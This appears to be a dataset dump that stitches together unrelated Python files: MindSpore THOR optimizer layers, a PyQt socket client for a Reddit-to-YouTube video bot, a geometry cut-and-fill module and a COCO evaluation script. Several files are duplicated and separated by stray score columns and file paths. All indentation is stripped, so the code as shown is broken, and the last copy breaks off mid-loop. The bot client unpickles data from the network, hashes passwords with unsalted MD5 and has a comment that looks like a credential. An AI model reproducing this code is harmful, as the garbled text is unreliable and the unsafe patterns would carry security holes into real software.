matrix_A = self.mul(matrix_A, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, self.axis)
damping_step = self.cast(damping_step, mstype.float32)
damping = self.sqrt(damping_step)
dampingA = self.cast(self.dampingA, mstype.float32)
matrix_A = matrix_A + damping * dampingA
matrix_A_inv = self.inv(matrix_A)
matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
self.matrix_A_inv = matrix_A_inv
self.matrix_G_inv = self.fake_G
output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
output_for_reshape = self.getG(output_for_reshape)
else:
output_for_reshape = self.gather(self.embedding_table, flat_ids, 0)
output = self.reshape(output_for_reshape, self.em_shape)
return output, self.embedding_table
class Dense_Thor(Cell):
"""Dense_Thor"""
def __init__(self,
in_channels,
out_channels,
weight_init='normal',
bias_init='zeros',
damping=0.03,
loss_scale=1,
frequency=100,
has_bias=False,
activation=None,
batch_size=12):
super(Dense_Thor, self).__init__()
self.in_channels = check_int_positive(in_channels)
self.out_channels = check_int_positive(out_channels)
self.has_bias = check_bool(has_bias)
self.thor = True
if isinstance(weight_init, Tensor):
if weight_init.dim() != 2 or weight_init.shape()[0] != out_channels or \
weight_init.shape()[1] != in_channels:
raise ValueError("weight_init shape error")
self.weight = Parameter(initializer(weight_init, [out_channels, in_channels]), name="weight")
if self.has_bias:
if isinstance(bias_init, Tensor):
if bias_init.dim() != 1 or bias_init.shape()[0] != out_channels:
raise ValueError("bias_init shape error")
self.bias = Parameter(initializer(bias_init, [out_channels]), name="bias")
self.matmul = P.MatMul(transpose_b=True)
self.bias_add = P.BiasAdd()
self.activation = get_activation(activation)
self.activation_flag = self.activation is not None
self.matrix_A_inv = Parameter(Tensor(np.zeros([in_channels, in_channels]).astype(np.float16)),
name='matrix_A_inv', requires_grad=False)
self.matrix_G_inv = Parameter(Tensor(np.zeros([out_channels, out_channels]).astype(np.float16)),
name="matrix_G_inv", requires_grad=False)
self.fake_G = Tensor(np.zeros([out_channels, out_channels]).astype(np.float16))
self.matmul = P.MatMul(transpose_b=True)
self.cube_matmul = P.CusMatMulCube(transpose_a=True)
self.matrix_combine = P.CusMatrixCombine()
self.cholesky = P.CusCholeskyTrsm()
self.shape = P.Shape()
self.reshape = P.Reshape()
self.transpose = P.Transpose()
self.cov_step = Parameter(initializer(0, [1], mstype.int32), name="cov_step", requires_grad=False)
self.mul = P.Mul()
self.cast = P.Cast()
self.damping = damping
self.loss_scale = Tensor(1 / loss_scale, mstype.float16)
self.vector_matmul = P.CusBatchMatMul()
self.gather = P.GatherV2()
self.assignadd = P.AssignAdd()
self.freq = Tensor(frequency, mstype.int32)
self.axis = 0
self.abs = P.Abs()
self.reduce_max = P.ReduceMax(keep_dims=False)
self.log = P.Log()
self.exp = P.Exp()
self.dampingA = Tensor(np.identity(in_channels), mstype.float32)
self.dampingG = Tensor(np.identity(out_channels), mstype.float32)
self.sqrt = P.Sqrt()
self.getG = P.InsertGradientOf(self.save_gradient)
self.batch_size = batch_size
def save_gradient(self, dout):
"""save_gradient"""
bs = self.cast(self.batch_size, mstype.float32)
out = dout
dout = self.mul(dout, self.loss_scale)
dout = self.mul(dout, bs)
shape = self.shape(dout)
normalizer = self.cast(shape[0], mstype.float32)
matrix_G = self.cube_matmul(dout, dout)
matrix_G = self.mul(matrix_G, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, 0)
damping_step = self.cast(damping_step, mstype.float32)
self.cov_step = self.cov_step + self.freq
damping = self.sqrt(damping_step)
dampingG = self.cast(self.dampingG, mstype.float32)
matrix_G = matrix_G + damping * dampingG
matrix_G_inv = self.cholesky(matrix_G)
matrix_G_inv = self.vector_matmul(matrix_G_inv, matrix_G_inv)
matrix_G_inv = self.matrix_combine(matrix_G_inv)
matrix_G_inv = self.cast(matrix_G_inv, mstype.float16)
self.matrix_G_inv = matrix_G_inv
return out
def construct(self, x):
"""construct"""
if self.thor:
inputs = self.cube_matmul(x, x)
shape = self.shape(x)
normalizer = self.cast(shape[0], mstype.float32)
matrix_A = self.mul(inputs, 1.0 / normalizer)
damping_step = self.gather(self.damping, self.cov_step, self.axis)
damping_step = self.cast(damping_step, mstype.float32)
damping = self.sqrt(damping_step)
dampingA = self.cast(self.dampingA, mstype.float32)
matrix_A = matrix_A + damping * dampingA
matrix_A_inv = self.cholesky(matrix_A)
matrix_A_inv = self.vector_matmul(matrix_A_inv, matrix_A_inv)
matrix_A_inv = self.matrix_combine(matrix_A_inv)
matrix_A_inv = self.cast(matrix_A_inv, mstype.float16)
self.matrix_A_inv = matrix_A_inv
self.matrix_G_inv = self.fake_G
output = self.matmul(x, self.weight)
output = self.getG(output)
else:
output = self.matmul(x, self.weight)
if self.has_bias:
output = self.bias_add(output, self.bias)
if self.activation_flag:
return self.activation(output)
return output
def extend_repr(self):
"""extend_repr"""
str_info = 'in_channels={}, out_channels={}, weight={}, has_bias={}' \
.format(self.in_channels, self.out_channels, self.weight, self.has_bias)
if self.has_bias:
str_info = str_info + ', bias={}'.format(self.bias)
if self.activation_flag:
str_info = str_info + ', activation={}'.format(self.activation)
return str_info | 0.893522 | 0.584597 |
import socket
from time import sleep
import sys
import pickle
from threading import Thread
from manualreview import rawscriptsmenu
import hashlib
from manualreview import videoscriptcore
import datetime
from manualreview import publishmenu
from manualreview import settings
from PyQt5 import QtWidgets
import configparser
from PyQt5.QtCore import *
from PyQt5 import QtGui
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import uic
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (settings.server_address, int(settings.server_port))
access_key = None
loginwindowinstance = None
login_sucess = None
logged_in_as = None
sendingToServer = False
recievingFromServer = False
lastPing = None
class LoginWindow(QMainWindow):
login_response = pyqtSignal()
def __init__(self):
QWidget.__init__(self)
uic.loadUi("UI/login.ui", self)
connectToServer()
self.login.clicked.connect(self.attemptLogin)
self.login_response.connect(self.loginResponse)
if not settings.auto_login_user == "":
login(settings.auto_login_user, settings.auto_login_password, self)
#admin icecream
def attemptLogin(self):
username = self.username.text()
password = self.password.text()
login(username, password, self)
def loginResponse(self):
if login_sucess:
self.status.setText("Status: Login Success")
self.close()
self.rawscriptsmenu = rawscriptsmenu.ScriptsMenu(logged_in_as)
self.rawscriptsmenu.show()
downloadScripts(settings.amount_scripts_download)
else:
self.status.setText("Status: Login Fail")
def formatVideoScript(script):
script_no = script.scriptno
final_script = script.final_script
videotype = script.videoType
video_settings = script.videosettings
music_type = script.music_type
thumbnail = script.thumbnail
characters_amount = script.charactersAmount
youtube_title = script.youtube_title
youtube_description = script.youtube_description
youtube_tags = script.youtube_tags
payload = (access_key, "upload-video", script_no, (final_script, videotype, video_settings, music_type, thumbnail, characters_amount, youtube_title, youtube_description, youtube_tags))
sendToServer(sock, payload)
def connectToServer():
print('connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
sock.settimeout(None)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=serverResponseListen)
thread.start()
thread = Thread(target=clientTick)
thread.start()
def clientTick():
global lastPing, recievingFromServer
while True:
sleep(1)
if not sendingToServer and not recievingFromServer:
if lastPing is None:
sendToServer(sock, (access_key, "PING",))
lastPing = datetime.datetime.now()
print("%s CLIENT sending ping" % (datetime.datetime.now()))
else:
now = datetime.datetime.now()
if not lastPing.minute == now.minute:
sendToServer(sock, (access_key, "PING",))
print("%s CLIENT sending ping (%s)" % (datetime.datetime.now(), now - lastPing))
lastPing = now
def login(username, password, loginwindowinstancearg = None):
global loginwindowinstance, logged_in_as
loginwindowinstance = loginwindowinstancearg
logged_in_as = username
payload = ("login-attempt", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def shutdown():
print("CLIENT shut down")
sock.shutdown(socket.SHUT_RDWR)
def flagscript(scriptno, flagtype):
print("%s CLIENT requesting to flag script" % datetime.datetime.now())
payload = (access_key, "flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def downloadScripts(amount):
global recievingFromServer
recievingFromServer = True
print("%s CLIENT requesting scripts" % datetime.datetime.now())
payload = (access_key, "request-scripts", amount)
sendToServer(sock, payload)
def editScript(scriptNo):
print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
payload = (access_key, "edit-script", scriptNo)
sendToServer(sock, payload)
def quitEditing(scriptNo):
print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
payload = (access_key, "quit-editing", scriptNo)
sendToServer(sock, payload)
def safeDisconnect():
print("%s CLIENT disconnecting" % (datetime.datetime.now()))
sock.shutdown(socket.SHUT_RDWR)
sock.close()
exit()
def parseScripts(scripts):
scripts = sorted(scripts, key=lambda x: x[4])
scripts.reverse()
for i, script in enumerate(scripts):
scriptno = script[0]
subreddit = script[1]
title = script[2]
author = script[3]
ups = script[4]
downs = script[5]
rawscript = script[6]
subid = script[7]
status = script[8]
editedby = script[9]
comments_amount = script[10]
newscript = []
for x, commentThread in enumerate(rawscript):
comment_to_append = ()
for y, comment in enumerate(commentThread):
comment_to_append = comment_to_append + (videoscriptcore.CommentWrapper(comment[0], comment[1], comment[2]), )
newscript.append(comment_to_append)
videoscriptcore.VideoScript(vidno=i, scriptno=scriptno, submission_id=subid, category=subreddit,
title=title,
author=author, upvotes=ups, comments=downs,
videotype="standardredditformat",
commentInformation=newscript, music_type="funny", status=status, editedby=editedby, commentsamount=comments_amount)
loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
def sendToServer(server, payloadattachment):
global sendingToServer
try:
sendingToServer = True
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
sendingToServer = False
except Exception:
print("Socket Broken!")
def serverResponseListen():
global access_key, loginwindowinstance, login_sucess, recievingFromServer
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
print("Socket Broken")
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
recievingFromServer = True
print("%s CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
recievingFromServer = False
full_msg = b""
if incomingdata[0] == "login-success":
login_success_arg = incomingdata[1]
access_key = incomingdata[2]
print("%s CLIENT received %s %s" % (datetime.datetime.now(), incomingdata[0], login_success_arg))
if loginwindowinstance is not None:
if login_success_arg:
login_sucess = True
else:
login_sucess = False
loginwindowinstance.login_response.emit()
elif incomingdata[0] == "scripts-return":
data = incomingdata[1]
print("%s CLIENT received %s scripts" % (datetime.datetime.now(), len(data)))
parseScripts(data)
break
elif incomingdata[0] == "edit-script-success":
edit_script_success = incomingdata[1]
edit_script_id = incomingdata[2]
if loginwindowinstance is not None:
if edit_script_success:
loginwindowinstance.rawscriptsmenu.edit_response_true.emit()
print("%s CLIENT edit approval for script %s" % (datetime.datetime.now(), edit_script_id))
else:
loginwindowinstance.rawscriptsmenu.edit_response_false.emit()
print("%s CLIENT edit denied for script %s" % (datetime.datetime.now(), edit_script_id))
elif incomingdata[0] == "script-status-update":
script_no = incomingdata[1]
script_status = incomingdata[2]
script_editedby = incomingdata[3]
print("%s CLIENT server updated script status %s to %s. User: %s" % (datetime.datetime.now(), script_no, script_status, script_editedby))
videoscriptcore.updateScriptStatus(script_no, script_status, script_editedby)
loginwindowinstance.rawscriptsmenu.update_table.emit()
#loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
elif incomingdata[0] == "script-upload-success":
success = incomingdata[1]
scriptno = incomingdata[2]
if success:
print("%s CLIENT server successfully uploaded video %s" % (
datetime.datetime.now(), scriptno))
loginwindowinstance.rawscriptsmenu.reset_editing_status.emit()
publishmenu.currentPublishMenu.upload_success_true.emit()
else:
print("%s CLIENT server couldn't upload video %s" % (
datetime.datetime.now(), scriptno))
publishmenu.currentPublishMenu.upload_success_false.emit()
elif incomingdata[0] == "PONG":
print("%s CLIENT recieved PONG" % (
datetime.datetime.now()))
print("%s CLIENT disconnected" % datetime.datetime.now()) | YouTube Bot Client/manualreview/client.py | import socket
from time import sleep
import sys
import pickle
from threading import Thread
from manualreview import rawscriptsmenu
import hashlib
from manualreview import videoscriptcore
import datetime
from manualreview import publishmenu
from manualreview import settings
from PyQt5 import QtWidgets
import configparser
from PyQt5.QtCore import *
from PyQt5 import QtGui
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import uic
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (settings.server_address, int(settings.server_port))
access_key = None
loginwindowinstance = None
login_sucess = None
logged_in_as = None
sendingToServer = False
recievingFromServer = False
lastPing = None
class LoginWindow(QMainWindow):
login_response = pyqtSignal()
def __init__(self):
QWidget.__init__(self)
uic.loadUi("UI/login.ui", self)
connectToServer()
self.login.clicked.connect(self.attemptLogin)
self.login_response.connect(self.loginResponse)
if not settings.auto_login_user == "":
login(settings.auto_login_user, settings.auto_login_password, self)
#admin icecream
def attemptLogin(self):
username = self.username.text()
password = self.password.text()
login(username, password, self)
def loginResponse(self):
if login_sucess:
self.status.setText("Status: Login Success")
self.close()
self.rawscriptsmenu = rawscriptsmenu.ScriptsMenu(logged_in_as)
self.rawscriptsmenu.show()
downloadScripts(settings.amount_scripts_download)
else:
self.status.setText("Status: Login Fail")
def formatVideoScript(script):
script_no = script.scriptno
final_script = script.final_script
videotype = script.videoType
video_settings = script.videosettings
music_type = script.music_type
thumbnail = script.thumbnail
characters_amount = script.charactersAmount
youtube_title = script.youtube_title
youtube_description = script.youtube_description
youtube_tags = script.youtube_tags
payload = (access_key, "upload-video", script_no, (final_script, videotype, video_settings, music_type, thumbnail, characters_amount, youtube_title, youtube_description, youtube_tags))
sendToServer(sock, payload)
def connectToServer():
print('connecting to %s port %s' % server_address)
try:
sock.connect(server_address)
sock.settimeout(None)
except ConnectionRefusedError:
input("Could not connect to server. Press enter to continue")
exit()
thread = Thread(target=serverResponseListen)
thread.start()
thread = Thread(target=clientTick)
thread.start()
def clientTick():
global lastPing, recievingFromServer
while True:
sleep(1)
if not sendingToServer and not recievingFromServer:
if lastPing is None:
sendToServer(sock, (access_key, "PING",))
lastPing = datetime.datetime.now()
print("%s CLIENT sending ping" % (datetime.datetime.now()))
else:
now = datetime.datetime.now()
if not lastPing.minute == now.minute:
sendToServer(sock, (access_key, "PING",))
print("%s CLIENT sending ping (%s)" % (datetime.datetime.now(), now - lastPing))
lastPing = now
def login(username, password, loginwindowinstancearg = None):
global loginwindowinstance, logged_in_as
loginwindowinstance = loginwindowinstancearg
logged_in_as = username
payload = ("login-attempt", username, hashlib.md5(password.encode()).hexdigest())
sendToServer(sock, payload)
def shutdown():
print("CLIENT shut down")
sock.shutdown(socket.SHUT_RDWR)
def flagscript(scriptno, flagtype):
print("%s CLIENT requesting to flag script" % datetime.datetime.now())
payload = (access_key, "flag-scripts", scriptno, flagtype)
sendToServer(sock, payload)
def downloadScripts(amount):
global recievingFromServer
recievingFromServer = True
print("%s CLIENT requesting scripts" % datetime.datetime.now())
payload = (access_key, "request-scripts", amount)
sendToServer(sock, payload)
def editScript(scriptNo):
print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
payload = (access_key, "edit-script", scriptNo)
sendToServer(sock, payload)
def quitEditing(scriptNo):
print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
payload = (access_key, "quit-editing", scriptNo)
sendToServer(sock, payload)
def safeDisconnect():
print("%s CLIENT disconnecting" % (datetime.datetime.now()))
sock.shutdown(socket.SHUT_RDWR)
sock.close()
exit()
def parseScripts(scripts):
scripts = sorted(scripts, key=lambda x: x[4])
scripts.reverse()
for i, script in enumerate(scripts):
scriptno = script[0]
subreddit = script[1]
title = script[2]
author = script[3]
ups = script[4]
downs = script[5]
rawscript = script[6]
subid = script[7]
status = script[8]
editedby = script[9]
comments_amount = script[10]
newscript = []
for x, commentThread in enumerate(rawscript):
comment_to_append = ()
for y, comment in enumerate(commentThread):
comment_to_append = comment_to_append + (videoscriptcore.CommentWrapper(comment[0], comment[1], comment[2]), )
newscript.append(comment_to_append)
videoscriptcore.VideoScript(vidno=i, scriptno=scriptno, submission_id=subid, category=subreddit,
title=title,
author=author, upvotes=ups, comments=downs,
videotype="standardredditformat",
commentInformation=newscript, music_type="funny", status=status, editedby=editedby, commentsamount=comments_amount)
loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
def sendToServer(server, payloadattachment):
global sendingToServer
try:
sendingToServer = True
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
server.sendall(payload)
sendingToServer = False
except Exception:
print("Socket Broken!")
def serverResponseListen():
global access_key, loginwindowinstance, login_sucess, recievingFromServer
print("Client listen thread active")
HEADERSIZE = 10
while True:
full_msg = b''
new_msg = True
while True:
try:
buf = sock.recv(2048)
except OSError:
print("Socket Broken")
break
if new_msg:
msglen = int(buf[:HEADERSIZE])
print("%s CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
new_msg = False
full_msg += buf
recievingFromServer = True
print("%s CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
if len(full_msg) - HEADERSIZE == msglen:
print("%s CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
new_msg = True
recievingFromServer = False
full_msg = b""
if incomingdata[0] == "login-success":
login_success_arg = incomingdata[1]
access_key = incomingdata[2]
print("%s CLIENT received %s %s" % (datetime.datetime.now(), incomingdata[0], login_success_arg))
if loginwindowinstance is not None:
if login_success_arg:
login_sucess = True
else:
login_sucess = False
loginwindowinstance.login_response.emit()
elif incomingdata[0] == "scripts-return":
data = incomingdata[1]
print("%s CLIENT received %s scripts" % (datetime.datetime.now(), len(data)))
parseScripts(data)
break
elif incomingdata[0] == "edit-script-success":
edit_script_success = incomingdata[1]
edit_script_id = incomingdata[2]
if loginwindowinstance is not None:
if edit_script_success:
loginwindowinstance.rawscriptsmenu.edit_response_true.emit()
print("%s CLIENT edit approval for script %s" % (datetime.datetime.now(), edit_script_id))
else:
loginwindowinstance.rawscriptsmenu.edit_response_false.emit()
print("%s CLIENT edit denied for script %s" % (datetime.datetime.now(), edit_script_id))
elif incomingdata[0] == "script-status-update":
script_no = incomingdata[1]
script_status = incomingdata[2]
script_editedby = incomingdata[3]
print("%s CLIENT server updated script status %s to %s. User: %s" % (datetime.datetime.now(), script_no, script_status, script_editedby))
videoscriptcore.updateScriptStatus(script_no, script_status, script_editedby)
loginwindowinstance.rawscriptsmenu.update_table.emit()
#loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
elif incomingdata[0] == "script-upload-success":
success = incomingdata[1]
scriptno = incomingdata[2]
if success:
print("%s CLIENT server successfully uploaded video %s" % (
datetime.datetime.now(), scriptno))
loginwindowinstance.rawscriptsmenu.reset_editing_status.emit()
publishmenu.currentPublishMenu.upload_success_true.emit()
else:
print("%s CLIENT server couldn't upload video %s" % (
datetime.datetime.now(), scriptno))
publishmenu.currentPublishMenu.upload_success_false.emit()
elif incomingdata[0] == "PONG":
print("%s CLIENT recieved PONG" % (
datetime.datetime.now()))
print("%s CLIENT disconnected" % datetime.datetime.now()) | 0.091696 | 0.050471 |
import sys
import logging
import numpy as np
import pandas as pnd
from shapely.geometry import LineString
import orangery.ops.geometry as og
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Change:
""" An analysis of the change between two Section objects.
Parameters
section1 (Section) : the initial condition.
section2 (Section) : the final condition.
close_ends (bool) : True indicates dangles should be closed with a vertical line.
"""
def __init__(self, section1, section2, close_ends=False):
self.section1 = section1
self.section2 = section2
self.polygon_plot = None
self.annotate_plot = None
try:
self.intersections, self.polygons, self.cutfill = og.difference(self.section1.line, self.section2.line, close_ends=close_ends)
except:
logger.error('Error calculating cut and fill')
raise
def summarize(self):
"""Prints summary information
"""
print('\n')
print("Length: ", self.length())
print("Fill: ", self.cutfill[self.cutfill > 0].sum())
print("Cut: ", self.cutfill[self.cutfill < 0].sum())
print("Net: ", self.cutfill.sum())
def length(self):
"""Return the length of overlap in two sections on which cut and fill was calculated
Result (float) : legnth of the cross-sectional cut and fill area
"""
p1 = self.intersections[0]
p2 = self.intersections[-1]
result = p1.distance(p2)
return result
def save(self, filename):
"""Save polygon cut-fill areas to csv file
Parameters
filename (str) : file to output
"""
line = LineString(self.intersections)
xs, _ = zip(*list(line.coords))
intervals = zip(xs[0::1], xs[1::1])
interval_df = pnd.DataFrame(list(intervals), columns=['x0', 'x1'])
result = interval_df.join(self.cutfill)
result.to_csv(filename, header=True)
# add plot method
import orangery.tools.plotting as _gfx
# Change.plot = _gfx.change_plot
Change.polygon_plot = _gfx.polygon_plot
Change.annotate_plot = _gfx.annotate_plot | orangery/core/change.py | import sys
import logging
import numpy as np
import pandas as pnd
from shapely.geometry import LineString
import orangery.ops.geometry as og
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Change:
""" An analysis of the change between two Section objects.
Parameters
section1 (Section) : the initial condition.
section2 (Section) : the final condition.
close_ends (bool) : True indicates dangles should be closed with a vertical line.
"""
def __init__(self, section1, section2, close_ends=False):
self.section1 = section1
self.section2 = section2
self.polygon_plot = None
self.annotate_plot = None
try:
self.intersections, self.polygons, self.cutfill = og.difference(self.section1.line, self.section2.line, close_ends=close_ends)
except:
logger.error('Error calculating cut and fill')
raise
def summarize(self):
"""Prints summary information
"""
print('\n')
print("Length: ", self.length())
print("Fill: ", self.cutfill[self.cutfill > 0].sum())
print("Cut: ", self.cutfill[self.cutfill < 0].sum())
print("Net: ", self.cutfill.sum())
def length(self):
"""Return the length of overlap in two sections on which cut and fill was calculated
Result (float) : legnth of the cross-sectional cut and fill area
"""
p1 = self.intersections[0]
p2 = self.intersections[-1]
result = p1.distance(p2)
return result
def save(self, filename):
"""Save polygon cut-fill areas to csv file
Parameters
filename (str) : file to output
"""
line = LineString(self.intersections)
xs, _ = zip(*list(line.coords))
intervals = zip(xs[0::1], xs[1::1])
interval_df = pnd.DataFrame(list(intervals), columns=['x0', 'x1'])
result = interval_df.join(self.cutfill)
result.to_csv(filename, header=True)
# add plot method
import orangery.tools.plotting as _gfx
# Change.plot = _gfx.change_plot
Change.polygon_plot = _gfx.polygon_plot
Change.annotate_plot = _gfx.annotate_plot | 0.58166 | 0.337217 |
import argparse
import logging
import pickle
import os
import sys
from pathlib import Path
import numpy as np
import _init_paths # noqa: F401
from utils.logging import setup_logging
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--coco-eval-pickle',
help=("Pickle file containing a COCOEval object; usually "
"'detection_results.pkl', or 'segmentation_results.pkl'."),
type=Path,
required=True)
parser.add_argument('--output-dir', required=True, type=Path)
parser.add_argument('--score-threshold', type=float, default=0.7)
parser.add_argument('--iou-threshold', type=float, default=0.5)
args = parser.parse_args()
assert args.coco_eval_pickle.exists()
args.output_dir.mkdir(exist_ok=True, parents=True)
output_log = str(args.output_dir / (Path(__file__).name + '.log'))
setup_logging(output_log)
logging.info('sys.argv: %s', ' '.join(sys.argv))
logging.info('Parsed args:\n%s', vars(args))
with open(args.coco_eval_pickle, 'rb') as f:
coco_eval = pickle.load(f)
images_with_unmatched_detections = set()
images_with_missed_groundtruth = set()
iou_matches = np.where(
np.isclose(
coco_eval.params.iouThrs, args.iou_threshold, rtol=0,
atol=1e-5))[0]
if iou_matches.size != 1:
raise ValueError(
'Could not find --iou-threshold (%s) in coco eval iouThrs (%s)' %
(args.iou_threshold, coco_eval.params.iouThrs))
iou_index = iou_matches.item()
for eval_info in coco_eval.evalImgs:
# Contains keys
# ['image_id', 'category_id', 'aRng', 'maxDet', 'dtIds', 'gtIds',
# 'dtMatches', 'gtMatches', 'dtScores', 'gtIgnore', 'dtIgnore']
if eval_info is None: # No detections, no groundtruth.
continue
image_id = eval_info['image_id']
if image_id in images_with_unmatched_detections:
continue
# detection_to_groundtruth[d] contains the id of the groundtruth
# matched to detection d, or '0' if there is no match.
detection_to_groundtruth = (eval_info['dtMatches'][iou_index].tolist())
detection_scores = eval_info['dtScores']
for detection_score, matched_groundtruth in zip(
detection_scores, detection_to_groundtruth):
if (detection_score > args.score_threshold
and matched_groundtruth == 0):
images_with_unmatched_detections.add(image_id)
detection_id_to_index = {
detection_id: index
for index, detection_id in enumerate(eval_info['dtIds'])
}
# groundtruth_to_detection[g] contains the id of the detection
# matched to groundtruth g, or 0 if there is no match.
groundtruth_to_detection = eval_info['gtMatches'][iou_index].tolist()
groundtruth_ids = eval_info['gtIds']
for groundtruth_id, detection_match in zip(groundtruth_ids,
groundtruth_to_detection):
assert detection_match.is_integer()
if detection_match != 0:
detection_score = detection_scores[detection_id_to_index[int(
detection_match)]]
if (detection_match == 0
or detection_score < args.score_threshold):
images_with_missed_groundtruth.add(image_id)
sequences_with_unmatched_detections = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in images_with_unmatched_detections)
sequences_with_missed_groundtruth = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in images_with_missed_groundtruth)
images_with_no_mistakes = (
set(coco_eval.cocoGt.imgs.keys()) - sequences_with_unmatched_detections
- sequences_with_missed_groundtruth)
all_sequences = set(
Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
for image_id in coco_eval.cocoGt.imgs.keys())
sequences_with_no_mistakes = (
all_sequences - sequences_with_missed_groundtruth -
sequences_with_unmatched_detections)
sequences_with_unmatched_detections = sorted(
sequences_with_unmatched_detections)
logging.info('Num images with unmatched detections: %s',
len(images_with_unmatched_detections))
logging.info('Num sequences with unmatched detections: %s',
len(sequences_with_unmatched_detections))
logging.info('Sequences with unmatched detections: %s',
', '.join(sequences_with_unmatched_detections))
with open(args.output_dir / 'false-positive-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_unmatched_detections))
sequences_with_missed_groundtruth = sorted(
sequences_with_missed_groundtruth)
logging.info('Num images with missed groundtruth: %s',
len(images_with_missed_groundtruth))
logging.info('Num sequences with missed groundtruth: %s',
len(sequences_with_missed_groundtruth))
logging.info('Sequences with missed groundtruth: %s',
', '.join(sorted(sequences_with_missed_groundtruth)))
with open(args.output_dir / 'false-negative-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_missed_groundtruth))
sequences_with_no_mistakes = sorted(sequences_with_no_mistakes)
logging.info('Num images with no mistakes: %s',
len(images_with_no_mistakes))
logging.info('Num sequences with no mistakes: %s',
len(sequences_with_no_mistakes))
logging.info('Sequences with no mistakes: %s',
', '.join(sequences_with_no_mistakes))
with open(args.output_dir / 'no-mistake-sequences.txt', 'w') as f:
f.write('\n'.join(sequences_with_no_mistakes))
if __name__ == "__main__":
main() | tools/one_off/list_video_mistake_types.py | import argparse
import logging
import pickle
import os
import sys
from pathlib import Path
import numpy as np
import _init_paths # noqa: F401
from utils.logging import setup_logging
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--coco-eval-pickle',
help=("Pickle file containing a COCOEval object; usually "
"'detection_results.pkl', or 'segmentation_results.pkl'."),
type=Path,
required=True)
parser.add_argument('--output-dir', required=True, type=Path)
parser.add_argument('--score-threshold', type=float, default=0.7)
parser.add_argument('--iou-threshold', type=float, default=0.5)
args = parser.parse_args()
assert args.coco_eval_pickle.exists()
args.output_dir.mkdir(exist_ok=True, parents=True)
output_log = str(args.output_dir / (Path(__file__).name + '.log'))
setup_logging(output_log)
logging.info('sys.argv: %s', ' '.join(sys.argv))
logging.info('Parsed args:\n%s', vars(args))
with open(args.coco_eval_pickle, 'rb') as f:
coco_eval = pickle.load(f)
images_with_unmatched_detections = set()
images_with_missed_groundtruth = set()
iou_matches = np.where(
np.isclose(
coco_eval.params.iouThrs, args.iou_threshold, rtol=0,
atol=1e-5))[0]
if iou_matches.size != 1:
raise ValueError(
'Could not find --iou-threshold (%s) in coco eval iouThrs (%s)' %
(args.iou_threshold, coco_eval.params.iouThrs))
iou_index = iou_matches.item()
for eval_info in coco_eval.evalImgs:
# Contains keys
# ['image_id', 'category_id', 'aRng', 'maxDet', 'dtIds', 'gtIds',
# 'dtMatches', 'gtMatches', 'dtScores', 'gtIgnore', 'dtIgnore']
if eval_info is None: # No detections, no groundtruth.
continue
image_id = eval_info['image_id']
if image_id in images_with_unmatched_detections:
continue
# detection_to_groundtruth[d] contains the id of the groundtruth
# matched to detection d, or '0' if there is no match.
detection_to_groundtruth = (eval_info['dtMatches'][iou_index].tolist())
detection_scores = eval_info['dtScores']
for detection_score, matched_groundtruth in zip(
detection_scores, detection_to_groundtruth):
if (detection_score > args.score_threshold
